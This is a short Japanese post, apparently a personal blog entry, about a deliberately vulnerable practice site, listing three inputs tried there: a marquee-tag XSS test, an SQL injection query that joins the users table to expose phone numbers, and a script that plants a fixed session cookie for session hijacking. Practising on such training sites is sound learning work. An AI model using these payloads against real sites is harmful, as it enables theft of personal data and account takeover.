ハッキングの遊びができるもの見つけた！

脆弱サイト

入力コマンド

1 XSS（投稿）

<marquee>ひさじゅのほーむぺーじ</marquee>

1. SQLインジェクションカテゴリのvalueを以下に変更

SELECT m.user_id, m.message, u.tel as created_at, m.category FROM messages as m join users as u on u.id = m.user_id order by m.id desc

セッションハイジャック

<script>document.cookie='session_key=a3cde67fd955af54b319678d6e;';</script>